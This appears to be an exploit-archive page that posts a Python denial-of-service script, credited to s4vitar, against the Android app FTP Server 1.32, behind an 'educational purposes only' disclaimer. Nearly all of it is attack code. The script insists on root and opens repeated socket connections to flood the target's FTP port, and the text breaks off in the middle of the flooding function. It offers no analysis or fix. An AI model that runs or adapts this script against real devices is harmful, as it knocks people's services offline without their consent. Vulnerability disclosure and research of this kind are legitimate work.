Ftp server 1.32 denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-02-28 |
Type : dos |
Platform : android
This exploit / vulnerability Ftp server 1.32 denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * FTP Server 1.32 Remote Denial of Service (DoS) *
# ************************************************************************
# Exploit Title: FTP Server 1.32 Remote Denial of Service (DoS)
# Date: 2019-02-26
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor: The Olive Tree
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
# Category: Mobile Apps
# Version: <= FTP Server 1.32
# Tested on: Android
import socket, random, string, signal, ssl, argparse, sys
from time import sleep
from threading import Thread, active_count
from os import system, geteuid
if geteuid() != 0:
print("\nPlease, run %s as root...\n" % sys.argv[0])
sys.exit()
stop = False
def signal_handler(signal, frame):
global stop
stop = True
def spam(target_ip, port):
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
s.connect((target_ip, port))
except:
pass
if stop == True:
break